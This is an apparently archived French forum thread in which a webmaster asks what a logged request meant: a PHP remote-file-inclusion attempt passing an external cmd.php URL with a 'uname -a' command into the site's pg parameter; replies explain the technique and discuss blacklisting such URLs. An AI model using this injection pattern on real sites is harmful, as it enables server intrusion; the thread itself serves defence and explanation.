OVH Cloud OVH Cloud

Tentative de quoi ?

46 réponses
Avatar
VarioFlux
Bonjour,

Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.

Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a

J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?

Merci

10 réponses

1 2 3 4 5
Avatar
Thibaut Allender

quelque part chez vous, regardez la page et vous verrez manifiquement....
rien du tout !


oui mais c'est a cause de register globals a off (ca execute system() ->
vide car $cmd vide)
mais ca n'est pas a cause du print

mon explication tient donc la route

--
freelance + web|system developer|designer
+ 32 496 26 75 76 + http://www.capsule.org

Avatar
Thibaut Allender

Dans ce cas je n'ai rien dit :) désolé ^___^


c'est le script distant qui est codé n'importe comment, mais sur le fond
tu as raison

--
freelance + web|system developer|designer
+ 32 496 26 75 76 + http://www.capsule.org

Avatar
EspaceTrain
Bonjour,

Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :

http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a


Bienvenu au club...

Voici 2 autres qui reviennent souvent dans mes logs en error404 avec le même
procédé de tentative d'inclusion que toi :

http://xor2560.tripod.com/2

et

http://www.tobyb.com/images/test.ph

On pourrait faire une liste de ces #{~#[|{##[, non ?


--
Fred

Avatar
Thibaut Allender

On pourrait faire une liste de ces #{~#[|{##[, non ?


ca servirait a quoi ?

--
freelance + web|system developer|designer
+ 32 496 26 75 76 + http://www.capsule.org

Avatar
Lionel
Thibaut Allender wrote:

On pourrait faire une liste de ces #{~#[|{##[, non ?


ca servirait a quoi ?


à améliorer ces scripts :-)


Avatar
Patrick
Merci ca je sais très bien, mais relisez ce qui précède: avec ce print,
le system() n'est *pas* exécuté sur le serveur attaqué. Donc attaque
point il n'y a.



bah si justement, c'est sur le serveur distant qu'il n'est pas exécuté
mais il l'est bel et bien sur le serveur attaqué.. ou alors j'ai rien
capté à tout ce qui me paraissait clair y'a 5 minutes ^___^


Non, en fait vous avez raison, je me suis laissé emporté en pensant à
autre chose, mais le include distant force l'exécution distante, donc les
commandes d'attque doivent être ``protégées'' pour ne pas être exécutées
à distance.

Satané PHP, quelle mauvaise idée d'autoriser les url dans les include...

Patrick.


Avatar
Thibaut Allender

Non, en fait vous avez raison, je me suis laissé emporté en pensant à
autre chose, mais le include distant force l'exécution distante, donc les
commandes d'attque doivent être ``protégées'' pour ne pas être exécutées
à distance.


oui, en fait c'est l'inverse de ce que tu dis ;)
sans print, la commande serait effectivement executee sur le serveur distant

le but du print est ici de "generer" un include sans en executer le code
prealablement

(je crois que j'ai reussi a etre clair cette fois, enfin j'espere)

--
freelance + web|system developer|designer
+ 32 496 26 75 76 + http://www.capsule.org

Avatar
EspaceTrain
Re,

ca servirait a quoi ?


Comme çà ils feront partis des blacklistés...
Perso, je teste et je les bloque en plus de ma protection habituelle.
--
Fred

Avatar
Thibaut Allender

Comme çà ils feront partis des blacklistés...
Perso, je teste et je les bloque en plus de ma protection habituelle.


tu les black list comment ?
rewrite_rule ?

--
thibaut allender | freelance | web|system developer|designer
+32 496 26 75 76 | http://capsule.org

Avatar
Stephane Kanschine
Dans <c1kqml$bjq$, Thibaut Allender tapotait :

On pourrait faire une liste de ces #{~#[|{##[, non ?


ca servirait a quoi ?


Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée
dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip
de connextion, que sais je encore.

Enfin ça reste HS :-)

--
Stephane Kanschine
Amadouer l'anti-spam pour me répondre


1 2 3 4 5